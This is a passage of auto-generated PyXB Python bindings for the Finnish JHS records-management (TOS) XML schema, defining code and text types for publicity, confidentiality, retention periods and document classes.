    _XSDLocation = None
    _Documentation = None
lisatiedotTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'lisatiedotTekstiTyyppi', lisatiedotTekstiTyyppi)
_module_typeBindings.lisatiedotTekstiTyyppi = lisatiedotTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}julkisuusluokkaKoodiTyyppi
# Publicity-class code restricted to the enumerated values '1'..'4'.
class julkisuusluokkaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'julkisuusluokkaKoodiTyyppi')
    _XSDLocation = None
    _Documentation = None
julkisuusluokkaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=julkisuusluokkaKoodiTyyppi, enum_prefix=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
julkisuusluokkaKoodiTyyppi._InitializeFacetMap(julkisuusluokkaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'julkisuusluokkaKoodiTyyppi', julkisuusluokkaKoodiTyyppi)
_module_typeBindings.julkisuusluokkaKoodiTyyppi = julkisuusluokkaKoodiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapitoAikaArvoTyyppi
class salassapitoAikaArvoTyyppi (pyxb.binding.datatypes.integer):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapitoAikaArvoTyyppi')
    _XSDLocation = None
    _Documentation = None
salassapitoAikaArvoTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapitoAikaArvoTyyppi', salassapitoAikaArvoTyyppi)
_module_typeBindings.salassapitoAikaArvoTyyppi = salassapitoAikaArvoTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapitoPerusteTekstiTyyppi
class salassapitoPerusteTekstiTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapitoPerusteTekstiTyyppi')
    _XSDLocation = None
    _Documentation = None
salassapitoPerusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapitoPerusteTekstiTyyppi', salassapitoPerusteTekstiTyyppi)
_module_typeBindings.salassapitoPerusteTekstiTyyppi = salassapitoPerusteTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapidonLaskentaperusteTekstiTyyppi
class salassapidonLaskentaperusteTekstiTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapidonLaskentaperusteTekstiTyyppi')
    _XSDLocation = None
    _Documentation = None
salassapidonLaskentaperusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapidonLaskentaperusteTekstiTyyppi', salassapidonLaskentaperusteTekstiTyyppi)
_module_typeBindings.salassapidonLaskentaperusteTekstiTyyppi = salassapidonLaskentaperusteTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}suojaustasoKoodiTyyppi
# Protection-level code restricted to the enumerated values '1'..'4'.
class suojaustasoKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'suojaustasoKoodiTyyppi')
    _XSDLocation = None
    _Documentation = None
suojaustasoKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=suojaustasoKoodiTyyppi, enum_prefix=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
suojaustasoKoodiTyyppi._InitializeFacetMap(suojaustasoKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'suojaustasoKoodiTyyppi', suojaustasoKoodiTyyppi)
_module_typeBindings.suojaustasoKoodiTyyppi = suojaustasoKoodiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}turvallisuusluokkaKoodiTyyppi
# Security-class code restricted to the enumerated values '1'..'4'.
class turvallisuusluokkaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'turvallisuusluokkaKoodiTyyppi')
    _XSDLocation = None
    _Documentation = None
turvallisuusluokkaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=turvallisuusluokkaKoodiTyyppi, enum_prefix=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
turvallisuusluokkaKoodiTyyppi._InitializeFacetMap(turvallisuusluokkaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'turvallisuusluokkaKoodiTyyppi', turvallisuusluokkaKoodiTyyppi)
_module_typeBindings.turvallisuusluokkaKoodiTyyppi = turvallisuusluokkaKoodiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}henkilotietoluonneKoodiTyyppi
# Personal-data-nature code restricted to the enumerated values '1'..'5'.
class henkilotietoluonneKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'henkilotietoluonneKoodiTyyppi')
    _XSDLocation = None
    _Documentation = None
henkilotietoluonneKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=henkilotietoluonneKoodiTyyppi, enum_prefix=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='5', tag=None)
henkilotietoluonneKoodiTyyppi._InitializeFacetMap(henkilotietoluonneKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'henkilotietoluonneKoodiTyyppi', henkilotietoluonneKoodiTyyppi)
_module_typeBindings.henkilotietoluonneKoodiTyyppi = henkilotietoluonneKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanPituusArvoTyyppi
# (Finnish doc: recommended values 0, 3, 6, 10, 20, 50, 120 or -1 = permanent retention.)
class sailytysajanPituusArvoTyyppi (pyxb.binding.datatypes.integer):
    """Suositeltavat arvot: 0, 3, 6, 10, 20, 50, 120 tai -1 (pysyvä säilytys)"""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanPituusArvoTyyppi')
    _XSDLocation = None
    _Documentation = 'Suositeltavat arvot: 0, 3, 6, 10, 20, 50, 120 tai -1 (pysyvä säilytys)'
sailytysajanPituusArvoTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanPituusArvoTyyppi', sailytysajanPituusArvoTyyppi)
_module_typeBindings.sailytysajanPituusArvoTyyppi = sailytysajanPituusArvoTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanPerusteTekstiTyyppi
# (Finnish doc: retention period may be based on law or the organization's
# own decision; permanent retention is based on a national-archives decision.)
class sailytysajanPerusteTekstiTyyppi (pyxb.binding.datatypes.string):
    """Säilytysaika voi perustua lakiin tai olla organisaation oma päätös. Pysyvä säilytys perustuu arkistolaitoksen päätökseen."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanPerusteTekstiTyyppi')
    _XSDLocation = None
    _Documentation = 'Säilytysaika voi perustua lakiin tai olla organisaation oma päätös. Pysyvä säilytys perustuu arkistolaitoksen päätökseen.'
sailytysajanPerusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanPerusteTekstiTyyppi', sailytysajanPerusteTekstiTyyppi)
_module_typeBindings.sailytysajanPerusteTekstiTyyppi = sailytysajanPerusteTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanLaskentaperusteTekstiTyyppi
class sailytysajanLaskentaperusteTekstiTyyppi (pyxb.binding.datatypes.string):
    """Suositeltavat arvot käsittelyprosessille: Asian lopullinen ratkaisu. Suositeltavat arvot asiakirjalle: Asian lopullinen ratkaisu, Asiakirjan päivämäärä."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanLaskentaperusteTekstiTyyppi')
    _XSDLocation = None
    _Documentation = 'Suositeltavat arvot käsittelyprosessille: Asian lopullinen ratkaisu. Suositeltavat arvot asiakirjalle: Asian lopullinen ratkaisu, Asiakirjan päivämäärä.'
sailytysajanLaskentaperusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanLaskentaperusteTekstiTyyppi', sailytysajanLaskentaperusteTekstiTyyppi)
_module_typeBindings.sailytysajanLaskentaperusteTekstiTyyppi = sailytysajanLaskentaperusteTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpideluokkaTekstiTyyppi
class toimenpideluokkaTekstiTyyppi (pyxb.binding.datatypes.string):
    """
    Suositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.
    """
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpideluokkaTekstiTyyppi')
    _XSDLocation = None
    _Documentation = '\n\tSuositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.\n\t '
toimenpideluokkaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'toimenpideluokkaTekstiTyyppi', toimenpideluokkaTekstiTyyppi)
_module_typeBindings.toimenpideluokkaTekstiTyyppi = toimenpideluokkaTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpideluokkaTarkenneTekstiTyyppi
class toimenpideluokkaTarkenneTekstiTyyppi (pyxb.binding.datatypes.string):
    """
    Suositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.
    """
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpideluokkaTarkenneTekstiTyyppi')
    _XSDLocation = None
    _Documentation = '\n\tSuositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.\n\t '
toimenpideluokkaTarkenneTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'toimenpideluokkaTarkenneTekstiTyyppi', toimenpideluokkaTarkenneTekstiTyyppi)
_module_typeBindings.toimenpideluokkaTarkenneTekstiTyyppi = toimenpideluokkaTarkenneTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjaLuokkaTekstiTyyppi
# (Finnish doc: recommended document-class values, always given in singular form.)
class asiakirjaLuokkaTekstiTyyppi (pyxb.binding.datatypes.string):
    """
    Suositeltavia arvoja ovat: Aloite, Asetus, Ehdotus, Esitys, Esityslista, Hakemus, Ilmoitus, Julkaisu, Kannanotto, Kantelu, Kartta, Kertomus, Kirje, Kutsu, Kuulutus, Kuva, Laki, Lasku, Lausunto, Lausuntopyyntö, Liite, Luettelo, Lupa, Mietintö, Muistio, Määräys, Nimittämiskirja, Ohje, Ohjelma, Oikaisuvaatimus, Ote, Piirustus, Pyyntö, Päätös, Pöytäkirja, Raportti, Seloste, Selvitys, Sopimus, Strategia, Suositus, Suunnitelma, Talousarvio, Tarjous, Tarjouspyyntö, Teos, Tiedote, Tilasto, Tilaus, Tilinpäätös, Todistus, Tosite, Valitus, Valtakirja, Vastine, Yhteenveto.
    Asiakirjatyypit ilmaistaan aina yksikkömuodossa.
    """
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiakirjaLuokkaTekstiTyyppi')
    _XSDLocation = None
    _Documentation = '\n\tSuositeltavia arvoja ovat: Aloite, Asetus, Ehdotus, Esitys, Esityslista, Hakemus, Ilmoitus, Julkaisu, Kannanotto, Kantelu, Kartta, Kertomus, Kirje, Kutsu, Kuulutus, Kuva, Laki, Lasku, Lausunto, Lausuntopyyntö, Liite, Luettelo, Lupa, Mietintö, Muistio, Määräys, Nimittämiskirja, Ohje, Ohjelma, Oikaisuvaatimus, Ote, Piirustus, Pyyntö, Päätös, Pöytäkirja, Raportti, Seloste, Selvitys, Sopimus, Strategia, Suositus, Suunnitelma, Talousarvio, Tarjous, Tarjouspyyntö, Teos, Tiedote, Tilasto, Tilaus, Tilinpäätös, Todistus, Tosite, Valitus, Valtakirja, Vastine, Yhteenveto.\n\tAsiakirjatyypit ilmaistaan aina yksikkömuodossa.\n\t '
asiakirjaLuokkaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'asiakirjaLuokkaTekstiTyyppi', asiakirjaLuokkaTekstiTyyppi)
_module_typeBindings.asiakirjaLuokkaTekstiTyyppi = asiakirjaLuokkaTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessinTilaTekstiTyyppi
class kasittelyprosessinTilaTekstiTyyppi (pyxb.binding.datatypes.string):
    """Atomic simple type derived from xs:string (handling-process state text).

    Recommended values (schema-defined, kept in Finnish): Avattu, Vireillä,
    Valmistelussa, Ratkaistavana, Toimitettu tiedoksi, Toimeenpantava,
    Päätetty, Avattu uudelleen, Muutoksenhaku, Seurannassa, Siirretty,
    Hävitetty.
    """
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelyprosessinTilaTekstiTyyppi')
    _XSDLocation = None
    # Verbatim XSD annotation text; runtime data, intentionally left in Finnish.
    _Documentation = '\n\tSuositeltavia arvoja ovat: Avattu, Vireillä, Valmistelussa, Ratkaistavana, Toimitettu tiedoksi, Toimeenpantava, Päätetty, Avattu uudelleen, Muutoksenhaku, Seurannassa, Siirretty, Hävitetty.\n\t\t\t'
# Finalize facets and register the binding in namespace and module maps.
kasittelyprosessinTilaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kasittelyprosessinTilaTekstiTyyppi', kasittelyprosessinTilaTekstiTyyppi)
_module_typeBindings.kasittelyprosessinTilaTekstiTyyppi = kasittelyprosessinTilaTekstiTyyppi
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
    """Anonymous complex type with ELEMENT_ONLY content.

    Holds a single TosTiedot child plus repeatable Luokka and Laajennos
    children (per their ElementDeclaration flags below); presumably the type
    of a schema root element -- TODO confirm against the XSD.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified name or recorded schema location.
    _ExpandedName = None
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosTiedot uses Python identifier TosTiedot
    __TosTiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), 'TosTiedot', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115TosTiedot', False, None, )

    TosTiedot = property(__TosTiedot.value, __TosTiedot.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Luokka uses Python identifier Luokka
    __Luokka = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), 'Luokka', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115Luokka', True, None, )

    Luokka = property(__Luokka.value, __Luokka.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )

    # Property doc string is the verbatim XSD annotation (runtime data, Finnish).
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Wire the element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __TosTiedot.name() : __TosTiedot,
        __Luokka.name() : __Luokka,
        __Laajennos.name() : __Laajennos
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the anonymous binding in the module-level registry.
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
    """Generic extension element type (ELEMENT_ONLY content).

    Extensions make organisation-specific elements possible: content is an
    open wildcard (any element), see _HasWildcardElement below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified name or recorded schema location.
    _ExpandedName = None
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Content model accepts arbitrary (wildcard) child elements.
    _HasWildcardElement = True
    # No named elements or attributes are declared on this type.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the anonymous binding in the module-level registry.
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeTyyppi with content type ELEMENT_ONLY
class nimekeTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type nimekeTyyppi ('title' type), ELEMENT_ONLY content.

    Carries a single NimekeTeksti child and repeatable NimekeKielella
    (title-in-a-given-language) children, per the declaration flags below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeTeksti uses Python identifier NimekeTeksti
    __NimekeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), 'NimekeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeTeksti', False, None, )

    NimekeTeksti = property(__NimekeTeksti.value, __NimekeTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeKielella uses Python identifier NimekeKielella
    __NimekeKielella = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), 'NimekeKielella', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeKielella', True, None, )

    NimekeKielella = property(__NimekeKielella.value, __NimekeKielella.set, None, None)

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __NimekeTeksti.name() : __NimekeTeksti,
        __NimekeKielella.name() : __NimekeKielella
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.nimekeTyyppi = nimekeTyyppi
Namespace.addCategoryObject('typeBinding', 'nimekeTyyppi', nimekeTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiasanatTyyppi with content type ELEMENT_ONLY
class asiasanatTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type asiasanatTyyppi ('keywords' type), ELEMENT_ONLY content.

    Carries repeatable AsiasanastoTeksti (thesaurus name) and AsiasanaTeksti
    (keyword) children, per the declaration flags below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiasanatTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiasanastoTeksti uses Python identifier AsiasanastoTeksti
    __AsiasanastoTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), 'AsiasanastoTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiasanatTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiasanastoTeksti', True, None, )

    AsiasanastoTeksti = property(__AsiasanastoTeksti.value, __AsiasanastoTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiasanaTeksti uses Python identifier AsiasanaTeksti
    __AsiasanaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), 'AsiasanaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiasanatTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiasanaTeksti', True, None, )

    AsiasanaTeksti = property(__AsiasanaTeksti.value, __AsiasanaTeksti.set, None, None)

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __AsiasanastoTeksti.name() : __AsiasanastoTeksti,
        __AsiasanaTeksti.name() : __AsiasanaTeksti
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.asiasanatTyyppi = asiasanatTyyppi
Namespace.addCategoryObject('typeBinding', 'asiasanatTyyppi', asiasanatTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelysaannotTyyppi with content type ELEMENT_ONLY
class kasittelysaannotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type kasittelysaannotTyyppi ('handling rules' type),
    ELEMENT_ONLY content.

    Children: JulkisuusluokkaMuutosTeksti, AiempienVersioidenPoistoTeksti,
    TallennuspaikkaTeksti, SailytyspaikkaTeksti (single occurrence each) and
    repeatable Laajennos extension elements, per the declaration flags below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelysaannotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}JulkisuusluokkaMuutosTeksti uses Python identifier JulkisuusluokkaMuutosTeksti
    __JulkisuusluokkaMuutosTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), 'JulkisuusluokkaMuutosTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115JulkisuusluokkaMuutosTeksti', False, None, )

    # Property doc strings below are verbatim XSD annotations (runtime data, Finnish).
    JulkisuusluokkaMuutosTeksti = property(__JulkisuusluokkaMuutosTeksti.value, __JulkisuusluokkaMuutosTeksti.set, None, 'Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).')

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AiempienVersioidenPoistoTeksti uses Python identifier AiempienVersioidenPoistoTeksti
    __AiempienVersioidenPoistoTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), 'AiempienVersioidenPoistoTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115AiempienVersioidenPoistoTeksti', False, None, )

    AiempienVersioidenPoistoTeksti = property(__AiempienVersioidenPoistoTeksti.value, __AiempienVersioidenPoistoTeksti.set, None, 'Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.')

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TallennuspaikkaTeksti uses Python identifier TallennuspaikkaTeksti
    __TallennuspaikkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), 'TallennuspaikkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TallennuspaikkaTeksti', False, None, )

    TallennuspaikkaTeksti = property(__TallennuspaikkaTeksti.value, __TallennuspaikkaTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytyspaikkaTeksti uses Python identifier SailytyspaikkaTeksti
    __SailytyspaikkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), 'SailytyspaikkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytyspaikkaTeksti', False, None, )

    SailytyspaikkaTeksti = property(__SailytyspaikkaTeksti.value, __SailytyspaikkaTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )

    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __JulkisuusluokkaMuutosTeksti.name() : __JulkisuusluokkaMuutosTeksti,
        __AiempienVersioidenPoistoTeksti.name() : __AiempienVersioidenPoistoTeksti,
        __TallennuspaikkaTeksti.name() : __TallennuspaikkaTeksti,
        __SailytyspaikkaTeksti.name() : __SailytyspaikkaTeksti,
        __Laajennos.name() : __Laajennos
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.kasittelysaannotTyyppi = kasittelysaannotTyyppi
Namespace.addCategoryObject('typeBinding', 'kasittelysaannotTyyppi', kasittelysaannotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kayttorajoitusTiedotTyyppi with content type ELEMENT_ONLY
class kayttorajoitusTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type kayttorajoitusTiedotTyyppi ('access restriction
    information' type), ELEMENT_ONLY content.

    Children (single occurrence unless noted): JulkisuusluokkaKoodi,
    SalassapitoAikaArvo, SalassapitoPerusteTeksti,
    SalassapidonLaskentaperusteTeksti, SuojaustasoKoodi,
    TurvallisuusluokkaKoodi, HenkilotietoluonneKoodi, plus repeatable
    Laajennos extension elements, per the declaration flags below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kayttorajoitusTiedotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
